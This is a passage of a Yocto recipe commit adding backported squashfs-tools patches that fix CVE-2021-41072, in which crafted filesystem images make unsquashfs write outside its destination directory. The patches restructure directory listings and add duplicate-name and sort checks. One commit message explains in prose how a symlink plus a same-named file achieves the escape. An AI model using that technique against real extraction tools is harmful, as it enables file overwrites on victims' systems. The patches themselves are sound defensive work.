+ squashfs-tools/unsquashfs.h | 1 +
+ 7 files changed, 14 insertions(+), 17 deletions(-)
+
+diff --git a/squashfs-tools/unsquash-1.c b/squashfs-tools/unsquash-1.c
+index acba821..7598499 100644
+--- a/squashfs-tools/unsquash-1.c
++++ b/squashfs-tools/unsquash-1.c
+@@ -373,8 +373,7 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ return dir;
+
+ corrupted:
+- free(dir->dirs);
+- free(dir);
++ squashfs_closedir(dir);
+ return NULL;
+ }
+
+diff --git a/squashfs-tools/unsquash-1234.c b/squashfs-tools/unsquash-1234.c
+index c2d4f42..0c8dfbb 100644
+--- a/squashfs-tools/unsquash-1234.c
++++ b/squashfs-tools/unsquash-1234.c
+@@ -25,8 +25,8 @@
+ * unsquash-4.
+ */
+
+-#define TRUE 1
+-#define FALSE 0
++#include "unsquashfs.h"
++
+ /*
+ * Check name for validity, name should not
+ * - be ".", "./", or
+@@ -56,3 +56,10 @@ int check_name(char *name, int size)
+
+ return TRUE;
+ }
++
++
++void squashfs_closedir(struct dir *dir)
++{
++ free(dir->dirs);
++ free(dir);
++}
+diff --git a/squashfs-tools/unsquash-2.c b/squashfs-tools/unsquash-2.c
+index 0746b3d..86f62ba 100644
+--- a/squashfs-tools/unsquash-2.c
++++ b/squashfs-tools/unsquash-2.c
+@@ -465,8 +465,7 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ return dir;
+
+ corrupted:
+- free(dir->dirs);
+- free(dir);
++ squashfs_closedir(dir);
+ return NULL;
+ }
+
+diff --git a/squashfs-tools/unsquash-3.c b/squashfs-tools/unsquash-3.c
+index 094caaa..c04aa9e 100644
+--- a/squashfs-tools/unsquash-3.c
++++ b/squashfs-tools/unsquash-3.c
+@@ -499,8 +499,7 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ return dir;
+
+ corrupted:
+- free(dir->dirs);
+- free(dir);
++ squashfs_closedir(dir);
+ return NULL;
+ }
+
+diff --git a/squashfs-tools/unsquash-4.c b/squashfs-tools/unsquash-4.c
+index 3a1b9e1..ff62dcc 100644
+--- a/squashfs-tools/unsquash-4.c
++++ b/squashfs-tools/unsquash-4.c
+@@ -436,8 +436,7 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ return dir;
+
+ corrupted:
+- free(dir->dirs);
+- free(dir);
++ squashfs_closedir(dir);
+ return NULL;
+ }
+
+diff --git a/squashfs-tools/unsquashfs.c b/squashfs-tools/unsquashfs.c
+index 7b590bd..04be53c 100644
+--- a/squashfs-tools/unsquashfs.c
++++ b/squashfs-tools/unsquashfs.c
+@@ -1350,13 +1350,6 @@ unsigned int *offset, unsigned int *type)
+ }
+
+
+-void squashfs_closedir(struct dir *dir)
+-{
+- free(dir->dirs);
+- free(dir);
+-}
+-
+-
+ char *get_component(char *target, char **targname)
+ {
+ char *start;
+diff --git a/squashfs-tools/unsquashfs.h b/squashfs-tools/unsquashfs.h
+index 2e9201c..5ecb2ab 100644
+--- a/squashfs-tools/unsquashfs.h
++++ b/squashfs-tools/unsquashfs.h
+@@ -291,4 +291,5 @@ extern long long *alloc_index_table(int);
+
+ /* unsquash-1234.c */
+ extern int check_name(char *, int);
++extern void squashfs_closedir(struct dir *);
+ #endif
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/squashfs-tools/files/CVE-2021-41072-requisite-2.patch b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-41072-requisite-2.patch
new file mode 100644
index 00000000000..0b80d07b3b8
--- /dev/null
+++ b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-41072-requisite-2.patch
@@ -0,0 +1,109 @@
+The commit is required by the fix for CVE-2021-41072. Update context for
+version 4.4.
+
+Upstream-Status: Backport [https://github.com/plougher/squashfs-tools/commit/1993a4e]
+
+Signed-off-by: Kai Kang <kai.kang@windriver.com>
+
+From 1993a4e7aeda04962bf26e84c15fba8b58837e10 Mon Sep 17 00:00:00 2001
+From: Phillip Lougher <phillip@squashfs.org.uk>
+Date: Sun, 12 Sep 2021 20:09:13 +0100
+Subject: [PATCH] unsquashfs: dynamically allocate name
+
+Dynamically allocate name rather than store it
+directly in structure.
+
+Signed-off-by: Phillip Lougher <phillip@squashfs.org.uk>
+---
+ squashfs-tools/unsquash-1.c | 2 +-
+ squashfs-tools/unsquash-1234.c | 5 +++++
+ squashfs-tools/unsquash-2.c | 2 +-
+ squashfs-tools/unsquash-3.c | 2 +-
+ squashfs-tools/unsquash-4.c | 2 +-
+ squashfs-tools/unsquashfs.h | 2 +-
+ 6 files changed, 10 insertions(+), 5 deletions(-)
+
+diff --git a/squashfs-tools/unsquash-1.c b/squashfs-tools/unsquash-1.c
+index 7598499..d0121c6 100644
+--- a/squashfs-tools/unsquash-1.c
++++ b/squashfs-tools/unsquash-1.c
+@@ -303,7 +303,7 @@ static struct dir *squashfs_opendir(unsi
+ "realloc failed!\n");
+ dir->dirs = new_dir;
+ }
+- strcpy(dir->dirs[dir->dir_count].name, dire->name);
++ dir->dirs[dir->dir_count].name = strdup(dire->name);
+ dir->dirs[dir->dir_count].start_block =
+ dirh.start_block;
+ dir->dirs[dir->dir_count].offset = dire->offset;
+diff --git a/squashfs-tools/unsquash-1234.c b/squashfs-tools/unsquash-1234.c
+index 0c8dfbb..ac46d9d 100644
+--- a/squashfs-tools/unsquash-1234.c
++++ b/squashfs-tools/unsquash-1234.c
+@@ -60,6 +60,11 @@ int check_name(char *name, int size)
+
+ void squashfs_closedir(struct dir *dir)
+ {
++ int i;
++
++ for(i = 0; i < dir->dir_count; i++)
++ free(dir->dirs[i].name);
++
+ free(dir->dirs);
+ free(dir);
+ }
+diff --git a/squashfs-tools/unsquash-2.c b/squashfs-tools/unsquash-2.c
+index 86f62ba..e847980 100644
+--- a/squashfs-tools/unsquash-2.c
++++ b/squashfs-tools/unsquash-2.c
+@@ -404,7 +404,7 @@ static struct dir *squashfs_opendir(unsi
+ "realloc failed!\n");
+ dir->dirs = new_dir;
+ }
+- strcpy(dir->dirs[dir->dir_count].name, dire->name);
++ dir->dirs[dir->dir_count].name = strdup(dire->name);
+ dir->dirs[dir->dir_count].start_block =
+ dirh.start_block;
+ dir->dirs[dir->dir_count].offset = dire->offset;
+diff --git a/squashfs-tools/unsquash-3.c b/squashfs-tools/unsquash-3.c
+index c04aa9e..8223f27 100644
+--- a/squashfs-tools/unsquash-3.c
++++ b/squashfs-tools/unsquash-3.c
+@@ -431,7 +431,7 @@ static struct dir *squashfs_opendir(unsi
+ "realloc failed!\n");
+ dir->dirs = new_dir;
+ }
+- strcpy(dir->dirs[dir->dir_count].name, dire->name);
++ dir->dirs[dir->dir_count].name = strdup(dire->name);
+ dir->dirs[dir->dir_count].start_block =
+ dirh.start_block;
+ dir->dirs[dir->dir_count].offset = dire->offset;
+diff --git a/squashfs-tools/unsquash-4.c b/squashfs-tools/unsquash-4.c
+index ff62dcc..1e199a7 100644
+--- a/squashfs-tools/unsquash-4.c
++++ b/squashfs-tools/unsquash-4.c
+@@ -367,7 +367,7 @@ static struct dir *squashfs_opendir(unsi
+ "realloc failed!\n");
+ dir->dirs = new_dir;
+ }
+- strcpy(dir->dirs[dir->dir_count].name, dire->name);
++ dir->dirs[dir->dir_count].name = strdup(dire->name);
+ dir->dirs[dir->dir_count].start_block =
+ dirh.start_block;
+ dir->dirs[dir->dir_count].offset = dire->offset;
+diff --git a/squashfs-tools/unsquashfs.h b/squashfs-tools/unsquashfs.h
+index 5ecb2ab..583fbe4 100644
+--- a/squashfs-tools/unsquashfs.h
++++ b/squashfs-tools/unsquashfs.h
+@@ -165,7 +165,7 @@ struct queue {
+ #define DIR_ENT_SIZE 16
+
+ struct dir_ent {
+- char name[SQUASHFS_NAME_LEN + 1];
++ char *name;
+ unsigned int start_block;
+ unsigned int offset;
+ unsigned int type;
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/squashfs-tools/files/CVE-2021-41072-requisite-3.patch b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-41072-requisite-3.patch
new file mode 100644
index 00000000000..fad5898f130
--- /dev/null
+++ b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-41072-requisite-3.patch
@@ -0,0 +1,330 @@
+The commit is required by the fix for CVE-2021-41072. Update context for
+version 4.4.
+
+Upstream-Status: Backport [https://github.com/plougher/squashfs-tools/commit/9938154]
+
+Signed-off-by: Kai Kang <kai.kang@windriver.com>
+
+From 9938154174756ee48a94ea0b076397a2944b028d Mon Sep 17 00:00:00 2001
+From: Phillip Lougher <phillip@squashfs.org.uk>
+Date: Sun, 12 Sep 2021 22:58:11 +0100
+Subject: [PATCH] unsquashfs: use linked list to store directory names
+
+This should bring higher performance, and it allows sorting
+if necessary (1.x and 2.0 filesystems).
+
+Signed-off-by: Phillip Lougher <phillip@squashfs.org.uk>
+---
+ squashfs-tools/unsquash-1.c | 30 +++++++++++++++---------------
+ squashfs-tools/unsquash-1234.c | 12 ++++++++----
+ squashfs-tools/unsquash-2.c | 29 +++++++++++++++--------------
+ squashfs-tools/unsquash-3.c | 29 +++++++++++++++--------------
+ squashfs-tools/unsquash-4.c | 29 +++++++++++++++--------------
+ squashfs-tools/unsquashfs.c | 16 ++++++++++------
+ squashfs-tools/unsquashfs.h | 3 ++-
+ 7 files changed, 80 insertions(+), 68 deletions(-)
+
+diff --git a/squashfs-tools/unsquash-1.c b/squashfs-tools/unsquash-1.c
+index d0121c6..b604434 100644
+--- a/squashfs-tools/unsquash-1.c
++++ b/squashfs-tools/unsquash-1.c
+@@ -207,7 +207,7 @@ static struct dir *squashfs_opendir(unsi
+ long long start;
+ int bytes;
+ int dir_count, size;
+- struct dir_ent *new_dir;
++ struct dir_ent *ent, *cur_ent = NULL;
+ struct dir *dir;
+
+ TRACE("squashfs_opendir: inode start block %d, offset %d\n",
+@@ -220,7 +220,7 @@ static struct dir *squashfs_opendir(unsi
+ EXIT_UNSQUASH("squashfs_opendir: malloc failed!\n");
+
+ dir->dir_count = 0;
+- dir->cur_entry = 0;
++ dir->cur_entry = NULL;
+ dir->mode = (*i)->mode;
+ dir->uid = (*i)->uid;
+ dir->guid = (*i)->gid;
+@@ -295,19 +295,20 @@ static struct dir *squashfs_opendir(unsi
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+- if((dir->dir_count % DIR_ENT_SIZE) == 0) {
+- new_dir = realloc(dir->dirs, (dir->dir_count +
+- DIR_ENT_SIZE) * sizeof(struct dir_ent));
+- if(new_dir == NULL)
+- EXIT_UNSQUASH("squashfs_opendir: "
+- "realloc failed!\n");
+- dir->dirs = new_dir;
+- }
+- dir->dirs[dir->dir_count].name = strdup(dire->name);
+- dir->dirs[dir->dir_count].start_block =
+- dirh.start_block;
+- dir->dirs[dir->dir_count].offset = dire->offset;
+- dir->dirs[dir->dir_count].type = dire->type;
++ ent = malloc(sizeof(struct dir_ent));
++ if(ent == NULL)
++ MEM_ERROR();
++
++ ent->name = strdup(dire->name);
++ ent->start_block = dirh.start_block;
++ ent->offset = dire->offset;
++ ent->type = dire->type;
++ ent->next = NULL;
++ if(cur_ent == NULL)
++ dir->dirs = ent;
++ else
++ cur_ent->next = ent;
++ cur_ent = ent;
+ dir->dir_count ++;
+ bytes += dire->size + 1;
+ }
+diff --git a/squashfs-tools/unsquash-1234.c b/squashfs-tools/unsquash-1234.c
+index ac46d9d..e389f8d 100644
+--- a/squashfs-tools/unsquash-1234.c
++++ b/squashfs-tools/unsquash-1234.c
+@@ -60,11 +60,15 @@ int check_name(char *name, int size)
+
+ void squashfs_closedir(struct dir *dir)
+ {
+- int i;
++ struct dir_ent *ent = dir->dirs;
+
+- for(i = 0; i < dir->dir_count; i++)
+- free(dir->dirs[i].name);
++ while(ent) {
++ struct dir_ent *tmp = ent;
++
++ ent = ent->next;
++ free(tmp->name);
++ free(tmp);
++ }
+
+- free(dir->dirs);
+ free(dir);
+ }
+diff --git a/squashfs-tools/unsquash-2.c b/squashfs-tools/unsquash-2.c
+index e847980..956f96f 100644
+--- a/squashfs-tools/unsquash-2.c
++++ b/squashfs-tools/unsquash-2.c
+@@ -308,7 +308,7 @@ static struct dir *squashfs_opendir(unsi
+ long long start;
+ int bytes;
+ int dir_count, size;
+- struct dir_ent *new_dir;
++ struct dir_ent *ent, *cur_ent = NULL;
+ struct dir *dir;
+
+ TRACE("squashfs_opendir: inode start block %d, offset %d\n",
+@@ -321,7 +321,7 @@ static struct dir *squashfs_opendir(unsi
+ EXIT_UNSQUASH("squashfs_opendir: malloc failed!\n");
+
+ dir->dir_count = 0;
+- dir->cur_entry = 0;
++ dir->cur_entry = NULL;
+ dir->mode = (*i)->mode;
+ dir->uid = (*i)->uid;
+ dir->guid = (*i)->gid;
+@@ -396,19 +396,20 @@ static struct dir *squashfs_opendir(unsi
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+- if((dir->dir_count % DIR_ENT_SIZE) == 0) {
+- new_dir = realloc(dir->dirs, (dir->dir_count +
+- DIR_ENT_SIZE) * sizeof(struct dir_ent));
+- if(new_dir == NULL)
+- EXIT_UNSQUASH("squashfs_opendir: "
+- "realloc failed!\n");
+- dir->dirs = new_dir;
+- }
+- dir->dirs[dir->dir_count].name = strdup(dire->name);
+- dir->dirs[dir->dir_count].start_block =
+- dirh.start_block;
+- dir->dirs[dir->dir_count].offset = dire->offset;
+- dir->dirs[dir->dir_count].type = dire->type;
++ ent = malloc(sizeof(struct dir_ent));
++ if(ent == NULL)
++ MEM_ERROR();
++
++ ent->name = strdup(dire->name);
++ ent->start_block = dirh.start_block;
++ ent->offset = dire->offset;
++ ent->type = dire->type;
++ ent->next = NULL;
++ if(cur_ent == NULL)
++ dir->dirs = ent;
++ else
++ cur_ent->next = ent;
++ cur_ent = ent;
+ dir->dir_count ++;
+ bytes += dire->size + 1;
+ }
+diff --git a/squashfs-tools/unsquash-3.c b/squashfs-tools/unsquash-3.c
+index 8223f27..835a574 100644
+--- a/squashfs-tools/unsquash-3.c
++++ b/squashfs-tools/unsquash-3.c
+@@ -334,7 +334,7 @@ static struct dir *squashfs_opendir(unsi
+ long long start;
+ int bytes;
+ int dir_count, size;
+- struct dir_ent *new_dir;
++ struct dir_ent *ent, *cur_ent = NULL;
+ struct dir *dir;
+
+ TRACE("squashfs_opendir: inode start block %d, offset %d\n",
+@@ -347,7 +347,7 @@ static struct dir *squashfs_opendir(unsi
+ EXIT_UNSQUASH("squashfs_opendir: malloc failed!\n");
+
+ dir->dir_count = 0;
+- dir->cur_entry = 0;
++ dir->cur_entry = NULL;
+ dir->mode = (*i)->mode;
+ dir->uid = (*i)->uid;
+ dir->guid = (*i)->gid;
+@@ -423,19 +423,20 @@ static struct dir *squashfs_opendir(unsi
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+- if((dir->dir_count % DIR_ENT_SIZE) == 0) {
+- new_dir = realloc(dir->dirs, (dir->dir_count +
+- DIR_ENT_SIZE) * sizeof(struct dir_ent));
+- if(new_dir == NULL)
+- EXIT_UNSQUASH("squashfs_opendir: "
+- "realloc failed!\n");
+- dir->dirs = new_dir;
+- }
+- dir->dirs[dir->dir_count].name = strdup(dire->name);
+- dir->dirs[dir->dir_count].start_block =
+- dirh.start_block;
+- dir->dirs[dir->dir_count].offset = dire->offset;
+- dir->dirs[dir->dir_count].type = dire->type;
++ ent = malloc(sizeof(struct dir_ent));
++ if(ent == NULL)
++ MEM_ERROR();
++
++ ent->name = strdup(dire->name);
++ ent->start_block = dirh.start_block;
++ ent->offset = dire->offset;
++ ent->type = dire->type;
++ ent->next = NULL;
++ if(cur_ent == NULL)
++ dir->dirs = ent;
++ else
++ cur_ent->next = ent;
++ cur_ent = ent;
+ dir->dir_count ++;
+ bytes += dire->size + 1;
+ }
+diff --git a/squashfs-tools/unsquash-4.c b/squashfs-tools/unsquash-4.c
+index 1e199a7..694783d 100644
+--- a/squashfs-tools/unsquash-4.c
++++ b/squashfs-tools/unsquash-4.c
+@@ -281,7 +281,7 @@ static struct dir *squashfs_opendir(unsi
+ long long start;
+ long long bytes;
+ int dir_count, size;
+- struct dir_ent *new_dir;
++ struct dir_ent *ent, *cur_ent = NULL;
+ struct dir *dir;
+
+ TRACE("squashfs_opendir: inode start block %d, offset %d\n",
+@@ -294,7 +294,7 @@ static struct dir *squashfs_opendir(unsi
+ EXIT_UNSQUASH("squashfs_opendir: malloc failed!\n");
+
+ dir->dir_count = 0;
+- dir->cur_entry = 0;
++ dir->cur_entry = NULL;
+ dir->mode = (*i)->mode;
+ dir->uid = (*i)->uid;
+ dir->guid = (*i)->gid;
+@@ -359,19 +359,20 @@ static struct dir *squashfs_opendir(unsi
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+- if((dir->dir_count % DIR_ENT_SIZE) == 0) {
+- new_dir = realloc(dir->dirs, (dir->dir_count +
+- DIR_ENT_SIZE) * sizeof(struct dir_ent));
+- if(new_dir == NULL)
+- EXIT_UNSQUASH("squashfs_opendir: "
+- "realloc failed!\n");
+- dir->dirs = new_dir;
+- }
+- dir->dirs[dir->dir_count].name = strdup(dire->name);
+- dir->dirs[dir->dir_count].start_block =
+- dirh.start_block;
+- dir->dirs[dir->dir_count].offset = dire->offset;
+- dir->dirs[dir->dir_count].type = dire->type;
++ ent = malloc(sizeof(struct dir_ent));
++ if(ent == NULL)
++ MEM_ERROR();
++
++ ent->name = strdup(dire->name);
++ ent->start_block = dirh.start_block;
++ ent->offset = dire->offset;
++ ent->type = dire->type;
++ ent->next = NULL;
++ if(cur_ent == NULL)
++ dir->dirs = ent;
++ else
++ cur_ent->next = ent;
++ cur_ent = ent;
+ dir->dir_count ++;
+ bytes += dire->size + 1;
+ }
+diff --git a/squashfs-tools/unsquashfs.c b/squashfs-tools/unsquashfs.c
+index 04be53c..fee28ec 100644
+--- a/squashfs-tools/unsquashfs.c
++++ b/squashfs-tools/unsquashfs.c
+@@ -1277,14 +1277,18 @@ failed:
+ int squashfs_readdir(struct dir *dir, char **name, unsigned int *start_block,
+ unsigned int *offset, unsigned int *type)
+ {
+- if(dir->cur_entry == dir->dir_count)
++ if(dir->cur_entry == NULL)
++ dir->cur_entry = dir->dirs;
++ else
++ dir->cur_entry = dir->cur_entry->next;
++
++ if(dir->cur_entry == NULL)
+ return FALSE;
+
+- *name = dir->dirs[dir->cur_entry].name;
+- *start_block = dir->dirs[dir->cur_entry].start_block;
+- *offset = dir->dirs[dir->cur_entry].offset;
+- *type = dir->dirs[dir->cur_entry].type;
+- dir->cur_entry ++;
++ *name = dir->cur_entry->name;
++ *start_block = dir->cur_entry->start_block;
++ *offset = dir->cur_entry->offset;
++ *type = dir->cur_entry->type;
+
+ return TRUE;
+ }
+diff --git a/squashfs-tools/unsquashfs.h b/squashfs-tools/unsquashfs.h
+index 583fbe4..f8cf78c 100644
+--- a/squashfs-tools/unsquashfs.h
++++ b/squashfs-tools/unsquashfs.h
+@@ -169,17 +169,18 @@ struct dir_ent {
+ unsigned int start_block;
+ unsigned int offset;
+ unsigned int type;
++ struct dir_ent *next;
+ };
+
+ struct dir {
+ int dir_count;
+- int cur_entry;
+ unsigned int mode;
+ uid_t uid;
+ gid_t guid;
+ unsigned int mtime;
+ unsigned int xattr;
+ struct dir_ent *dirs;
++ struct dir_ent *cur_entry;
+ };
+
+ struct file_entry {
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/squashfs-tools/files/CVE-2021-41072.patch b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-41072.patch
new file mode 100644
index 00000000000..29ec3bbeaba
--- /dev/null
+++ b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-41072.patch
@@ -0,0 +1,316 @@
+CVE: CVE-2021-41072
+Upstream-Status: Backport [https://github.com/plougher/squashfs-tools/commit/e048580]
+
+Backport commit to fix CVE-2021-41072. And squash a follow-up fix for
+CVE-2021-41072 from upstream:
+https://github.com/plougher/squashfs-tools/commit/19fcc93
+
+Update context for version 4.4.
+
+Signed-off-by: Kai Kang <kai.kang@windriver.com>
+
+From e0485802ec72996c20026da320650d8362f555bd Mon Sep 17 00:00:00 2001
+From: Phillip Lougher <phillip@squashfs.org.uk>
+Date: Sun, 12 Sep 2021 23:50:06 +0100
+Subject: [PATCH] Unsquashfs: additional write outside destination directory
+ exploit fix
+
+An issue on github (https://github.com/plougher/squashfs-tools/issues/72)
+showed how some specially crafted Squashfs filesystems containing
+invalid file names (with '/' and '..') can cause Unsquashfs to write
+files outside of the destination directory.
+
+Since then it has been shown that specially crafted Squashfs filesystems
+that contain a symbolic link pointing outside of the destination directory,
+coupled with an identically named file within the same directory, can
+cause Unsquashfs to write files outside of the destination directory.
+
+Specifically the symbolic link produces a pathname pointing outside
+of the destination directory, which is then followed when writing the
+duplicate identically named file within the directory.
+
+This commit fixes this exploit by explictly checking for duplicate
+filenames within a directory. As directories in v2.1, v3.x, and v4.0
+filesystems are sorted, this is achieved by checking for consecutively
+identical filenames. Additionally directories are checked to
+ensure they are sorted, to avoid attempts to evade the duplicate
+check.
+
+Version 1.x and 2.0 filesystems (where the directories were unsorted)
+are sorted and then the above duplicate filename check is applied.
+
+Signed-off-by: Phillip Lougher <phillip@squashfs.org.uk>
+---
+ squashfs-tools/Makefile | 6 +-
+ squashfs-tools/unsquash-1.c | 6 ++
+ squashfs-tools/unsquash-12.c | 110 +++++++++++++++++++++++++++++++++
+ squashfs-tools/unsquash-1234.c | 21 +++++++
+ squashfs-tools/unsquash-2.c | 16 +++++
+ squashfs-tools/unsquash-3.c | 6 ++
+ squashfs-tools/unsquash-4.c | 6 ++
+ squashfs-tools/unsquashfs.h | 4 ++
+ 8 files changed, 173 insertions(+), 2 deletions(-)
+ create mode 100644 squashfs-tools/unsquash-12.c
+
+diff --git a/squashfs-tools/Makefile b/squashfs-tools/Makefile
+index 7262a2e..1b544ed 100755
+--- a/squashfs-tools/Makefile
++++ b/squashfs-tools/Makefile
+@@ -156,8 +156,8 @@ MKSQUASHFS_OBJS = mksquashfs.o read_fs.o
+ caches-queues-lists.o
+
+ UNSQUASHFS_OBJS = unsquashfs.o unsquash-1.o unsquash-2.o unsquash-3.o \
+- unsquash-4.o unsquash-123.o unsquash-34.o unsquash-1234.o swap.o \
+- compressor.o unsquashfs_info.o
++ unsquash-4.o unsquash-123.o unsquash-34.o unsquash-1234.o unsquash-12.o \
++ swap.o compressor.o unsquashfs_info.o
+
+ CFLAGS ?= -O2
+ CFLAGS += $(EXTRA_CFLAGS) $(INCLUDEDIR) -D_FILE_OFFSET_BITS=64 \
+@@ -353,6 +353,8 @@ unsquash-34.o: unsquashfs.h unsquash-34.c unsquashfs_error.h
+
+ unsquash-1234.o: unsquash-1234.c
+
++unsquash-12.o: unsquash-12.c unsquashfs.h
++
+ unsquashfs_xattr.o: unsquashfs_xattr.c unsquashfs.h squashfs_fs.h xattr.h
+
+ unsquashfs_info.o: unsquashfs.h squashfs_fs.h
+--- a/squashfs-tools/unsquash-1.c
++++ b/squashfs-tools/unsquash-1.c
+@@ -314,6 +314,12 @@ static struct dir *squashfs_opendir(unsi
+ }
+ }
+
++ /* check directory for duplicate names. Need to sort directory first */
++ sort_directory(dir);
++ if(check_directory(dir) == FALSE) {
++ ERROR("File system corrupted: directory has duplicate names\n");
++ goto corrupted;
++ }
+ return dir;
+
+ corrupted:
+diff --git a/squashfs-tools/unsquash-12.c b/squashfs-tools/unsquash-12.c
+new file mode 100644
+index 0000000..61bf128
+--- /dev/null
++++ b/squashfs-tools/unsquash-12.c
+@@ -0,0 +1,110 @@
++/*
++ * Unsquash a squashfs filesystem. This is a highly compressed read only
++ * filesystem.
++ *
++ * Copyright (c) 2021
++ * Phillip Lougher <phillip@squashfs.org.uk>
++ *
++ * This program is free software; you can redistribute it and/or
++ * modify it under the terms of the GNU General Public License
++ * as published by the Free Software Foundation; either version 2,
++ * or (at your option) any later version.
++ *
++ * This program is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with this program; if not, write to the Free Software
++ * Foundation, 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
++ *
++ * unsquash-12.c
++ *
++ * Helper functions used by unsquash-1 and unsquash-2.
++ */
++
++#include "unsquashfs.h"
++
++/*
++ * Bottom up linked list merge sort.
++ *
++ */
++void sort_directory(struct dir *dir)
++{
++ struct dir_ent *cur, *l1, *l2, *next;
++ int len1, len2, stride = 1;
++
++ if(dir->dir_count < 2)
++ return;
++
++ /*
++ * We can consider our linked-list to be made up of stride length
++ * sublists. Eacn iteration around this loop merges adjacent
++ * stride length sublists into larger 2*stride sublists. We stop
++ * when stride becomes equal to the entire list.
++ *
++ * Initially stride = 1 (by definition a sublist of 1 is sorted), and
++ * these 1 element sublists are merged into 2 element sublists, which
++ * are then merged into 4 element sublists and so on.
++ */
++ do {
++ l2 = dir->dirs; /* head of current linked list */
++ cur = NULL; /* empty output list */
++
++ /*
++ * Iterate through the linked list, merging adjacent sublists.
++ * On each interation l2 points to the next sublist pair to be
++ * merged (if there's only one sublist left this is simply added
++ * to the output list)
++ */
++ while(l2) {
++ l1 = l2;
++ for(len1 = 0; l2 && len1 < stride; len1 ++, l2 = l2->next);
++ len2 = stride;
++
++ /*
++ * l1 points to first sublist.
++ * l2 points to second sublist.
++ * Merge them onto the output list
++ */
++ while(len1 && l2 && len2) {
++ if(strcmp(l1->name, l2->name) <= 0) {
++ next = l1;
++ l1 = l1->next;
++ len1 --;
++ } else {
++ next = l2;
++ l2 = l2->next;
++ len2 --;
++ }
++
++ if(cur) {
++ cur->next = next;
++ cur = next;
++ } else
++ dir->dirs = cur = next;
++ }
++ /*
++ * One sublist is now empty, copy the other one onto the
++ * output list
++ */
++ for(; len1; len1 --, l1 = l1->next) {
++ if(cur) {
++ cur->next = l1;
++ cur = l1;
++ } else
++ dir->dirs = cur = l1;
++ }
++ for(; l2 && len2; len2 --, l2 = l2->next) {
++ if(cur) {
++ cur->next = l2;
++ cur = l2;
++ } else
++ dir->dirs = cur = l2;
++ }
++ }
++ cur->next = NULL;
++ stride = stride << 1;
++ } while(stride < dir->dir_count);
++}
+diff --git a/squashfs-tools/unsquash-1234.c b/squashfs-tools/unsquash-1234.c
+index e389f8d..98a81ed 100644
+--- a/squashfs-tools/unsquash-1234.c
++++ b/squashfs-tools/unsquash-1234.c
+@@ -72,3 +72,24 @@ void squashfs_closedir(struct dir *dir)
+
+ free(dir);
+ }
++
++
++/*
++ * Check directory for duplicate names. As the directory should be sorted,
++ * duplicates will be consecutive. Obviously we also need to check if the
++ * directory has been deliberately unsorted, to evade this check.
++ */
++int check_directory(struct dir *dir)
++{
++ int i;
++ struct dir_ent *ent;
++
++ if(dir->dir_count < 2)
++ return TRUE;
++
++ for(ent = dir->dirs, i = 0; i < dir->dir_count - 1; ent = ent->next, i++)
++ if(strcmp(ent->name, ent->next->name) >= 0)
++ return FALSE;
++
++ return TRUE;
++}
+diff --git a/squashfs-tools/unsquash-2.c b/squashfs-tools/unsquash-2.c
+index 956f96f..0e36f7d 100644
+--- a/squashfs-tools/unsquash-2.c
++++ b/squashfs-tools/unsquash-2.c
+@@ -29,6 +29,7 @@ static squashfs_fragment_entry_2 *fragme
+ static unsigned int *uid_table, *guid_table;
+ static char *inode_table, *directory_table;
+ static squashfs_operations ops;
++static int needs_sorting = FALSE;
+
+ static void read_block_list(unsigned int *block_list, char *block_ptr, int blocks)
+ {
+@@ -415,6 +416,17 @@ static struct dir *squashfs_opendir(unsi
+ }
+ }
+
++ if(needs_sorting)
++ sort_directory(dir);
++
++ /* check directory for duplicate names and sorting */
++ if(check_directory(dir) == FALSE) {
++ if(needs_sorting)
++ ERROR("File system corrupted: directory has duplicate names\n");
++ else
++ ERROR("File system corrupted: directory has duplicate names or is unsorted\n");
++ goto corrupted;
++ }
+ return dir;
+
+ corrupted:
+--- a/squashfs-tools/unsquash-3.c
++++ b/squashfs-tools/unsquash-3.c
+@@ -442,6 +442,12 @@ static struct dir *squashfs_opendir(unsi
+ }
+ }
+
++ /* check directory for duplicate names and sorting */
++ if(check_directory(dir) == FALSE) {
++ ERROR("File system corrupted: directory has duplicate names or is unsorted\n");
++ goto corrupted;
++ }
++
+ return dir;
+
+ corrupted:
+diff --git a/squashfs-tools/unsquash-4.c b/squashfs-tools/unsquash-4.c
+index 694783d..c615bb8 100644
+--- a/squashfs-tools/unsquash-4.c
++++ b/squashfs-tools/unsquash-4.c
+@@ -378,6 +378,12 @@ static struct dir *squashfs_opendir(unsi
+ }
+ }
+
++ /* check directory for duplicate names and sorting */
++ if(check_directory(dir) == FALSE) {
++ ERROR("File system corrupted: directory has duplicate names or is unsorted\n");
++ goto corrupted;
++ }
++
+ return dir;
+
+ corrupted:
+diff --git a/squashfs-tools/unsquashfs.h b/squashfs-tools/unsquashfs.h
+index f8cf78c..bf2a80d 100644
+--- a/squashfs-tools/unsquashfs.h
++++ b/squashfs-tools/unsquashfs.h
+@@ -266,4 +266,8 @@ extern long long *alloc_index_table(int)
+ /* unsquash-1234.c */
+ extern int check_name(char *, int);
+ extern void squashfs_closedir(struct dir *);
++extern int check_directory(struct dir *);
++
++/* unsquash-12.c */
++extern void sort_directory(struct dir *);
+ #endif
+--
+2.17.1
+
